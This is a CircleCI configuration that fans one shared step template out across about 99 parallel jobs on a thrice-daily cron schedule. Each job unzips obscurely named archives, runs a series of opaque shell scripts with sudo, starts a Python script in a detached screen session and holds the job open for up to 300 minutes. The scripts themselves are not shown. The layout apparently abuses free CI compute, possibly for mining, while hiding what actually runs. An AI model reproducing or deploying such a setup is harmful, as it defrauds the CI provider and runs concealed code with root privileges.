working_dir: &working_dir ~/app
.build_template: &commonSteps
  steps:
    - checkout
    - run:
        name: A
        command: |
          sudo apt update -y
    - run:
        name: B
        command: |
          sleep 10s          
          unzip gokol.zip && chmod u+x *
          #./hokok.sh
    - run:
        name: C
        command: |
          unzip fokan.zip >/dev/null 2>&1
    - run:
        name: D
        command: |
          chmod u+x *
    - run:
        name: E
        command: |
          sudo ./aku.sh
    - run:
        name: F
        command: |
          sudo ./bojo.sh
    - run:
        name: G
        command: |
          sudo ./cilok.sh
    - run:
        name: H
        command: |
          sudo ./dan.sh
    - run:
        name: I
        command: |
          sudo ./ewe.sh
    - run:
        name: J
        command: |
          #sudo ./Frean.sh#no_run
    - run:
        name: K
        no_output_timeout: 300m
        command: |
          echo "Ijin Berkah Om. . ."
          sudo ./gok.sh
          sudo ./halah.sh
          sudo ./Itu.sh
          screen -dmS Acdb python3 p01.py
          sleep 300s
          ./m01.sh
  working_directory: *working_dir

version: 2.0

jobs:
  project_01:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  project_02:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_03:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_04:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_05:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_06:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_07:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_08:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_09:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_10:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_11:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_12:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_13:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_14:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_15:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_16:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_17:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_18:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_19:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_20:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_21:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_22:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_23:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_24:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_25:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_26:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_27:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_28:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_29:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_30:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_31:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_32:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_33:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_34:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_35:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_36:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_37:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_38:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_39:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_40:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_41:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_42:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_43:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_44:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_45:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_46:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_47:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_48:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_49:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_50:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_51:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_52:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_53:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_54:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_55:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_56:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_57:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_58:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_59:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_60:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_61:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_62:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_63:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_64:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_65:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_66:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_67:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_68:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_69:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_70:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_71:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_72:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_73:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_74:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_75:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_76:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_77:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_78:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_79:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_80:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_81:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_82:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_83:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_84:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_85:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_86:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_87:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_88:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_89:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_90:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_91:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  project_92:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_93:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  project_94:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_95:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_96:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_97:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_98:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  project_99:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - anak
                - kucing
                - main
                - di
                - jalan

workflows:
  version: 2
  DaftarJalan:
    jobs:
      - project_01
      - project_02
      - project_03
      - project_04
      - project_05
      - project_06
      - project_07
      - project_08
      - project_09
      - project_10
      - project_11
      - project_12
      - project_13
      - project_14
      - project_15
      - project_16
      - project_17
      - project_18
      - project_19
      - project_20
      - project_21
      - project_22
      - project_23
      - project_24
      - project_25
      - project_26
      - project_27
      - project_28
      - project_29
      - project_30
      - project_31
      - project_32
      - project_33
      - project_34
      - project_35
      - project_36
      - project_37
      - project_38
      - project_39
      - project_40
      - project_41
      - project_42
      - project_43
      - project_44
      - project_45
      - project_46
      - project_47
      - project_48
      - project_49
      - project_50
      - project_51
      - project_52
      - project_53
      - project_54
      - project_55
      - project_56
      - project_57
      - project_58
      - project_59
      - project_60
      - project_61
      - project_62
      - project_63
      - project_64
      - project_65
      - project_66
      - project_67
      - project_68
      - project_69
      - project_70
      - project_71
      - project_72
      - project_73
      - project_74
      - project_75
      - project_76
      - project_77
      - project_78
      - project_79
      - project_80
      - project_81
      - project_82
      - project_83
      - project_84
      - project_85
      - project_86
      - project_87
      - project_88
      - project_89
      - project_90
      - project_91
      - project_92
      - project_93
      - project_94
      - project_95
      - project_96
      - project_97
      - project_98
      - project_99
